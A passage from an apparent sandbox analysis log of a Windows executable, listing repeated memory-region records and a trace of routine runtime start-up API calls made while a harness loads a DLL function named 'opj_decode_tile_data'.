0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4671 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4672 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4673 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4674 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4675 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4676 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4677 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4678 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4679 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4680 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4681 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4682 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4683 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4684 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4685 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4686 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4687 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4688 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4689 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4690 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4691 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4692 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4693 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4694 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4695 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6473 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 6474 start_va = 0x1b0000 end_va = 0x1d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 6475 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 6476 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Thread: id = 172 os_tid = 0xa08 [0148.867] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0148.868] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0148.868] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0148.869] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0148.869] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0148.870] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0148.870] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0148.870] GetProcessHeap () returned 0x450000 [0148.870] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0148.871] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0148.871] GetLastError () returned 0x7e [0148.871] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0148.871] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0148.871] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x3c8) returned 0x45c320 [0148.871] SetLastError (dwErrCode=0x7e) [0148.872] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1200) returned 0x463470 [0148.874] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0148.874] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0148.874] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0148.874] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0148.874] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_decode_tile_data" [0148.874] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_decode_tile_data" [0148.874] GetACP () returned 0x4e4 [0148.874] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x228) returned 0x455380 [0148.875] IsValidCodePage (CodePage=0x4e4) returned 1 [0148.875] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0148.875] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0148.875] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0148.875] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0148.875] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0148.875] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0148.875] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0148.875] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0148.875] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0148.875] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0148.875] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0148.875] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0148.875] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0148.876] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0148.876] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0148.876] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0148.876] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0148.876] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x100) returned 0x461c20 [0148.876] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0148.876] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x17c) returned 0x459aa0 [0148.876] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0148.876] GetLastError () returned 0x0 [0148.876] SetLastError (dwErrCode=0x0) [0148.876] GetEnvironmentStringsW () returned 0x464680* [0148.876] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x9cc) returned 0x465060 [0148.876] FreeEnvironmentStringsW (penv=0x464680) returned 1 [0148.876] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x118) returned 0x45a6b0 [0148.876] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x3e) returned 0x460d10 [0148.876] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x5c) returned 0x450780 [0148.876] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x62) returned 0x454c00 [0148.876] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x78) returned 0x45c6f0 [0148.876] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x62) returned 0x455a40 [0148.876] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x28) returned 0x45b290 [0148.876] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x48) returned 0x460860 [0148.876] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1a) returned 0x45b890 [0148.876] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x3a) returned 0x460630 [0148.876] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x62) returned 0x454510 [0148.876] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x2a) returned 0x45c770 [0148.876] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x2e) returned 0x454c70 [0148.876] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1c) returned 0x45b380 [0148.876] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xd2) returned 0x455cd0 [0148.876] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x7c) returned 0x454000 [0148.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x3a) returned 0x460a40 [0148.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x90) returned 0x453c20 [0148.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x45b5c0 [0148.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x30) returned 0x454580 [0148.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x36) returned 0x455ab0 [0148.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x3c) returned 0x460db0 [0148.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x52) returned 0x459680 [0148.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x3c) returned 0x460c20 [0148.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xd6) returned 0x455610 [0148.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x2e) returned 0x4520d0 [0148.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1e) returned 0x45b710 [0148.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x2c) returned 0x452110 [0148.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x54) returned 0x459560 [0148.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x52) returned 0x4594a0 [0148.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x45b3b0 [0148.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x42) returned 0x460270 [0148.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x2c) returned 0x452150 [0148.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x44) returned 0x4603b0 [0148.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x45b3e0 [0148.877] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x465060 | out: hHeap=0x450000) returned 1 [0148.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1000) returned 0x464680 [0148.877] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0148.878] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", 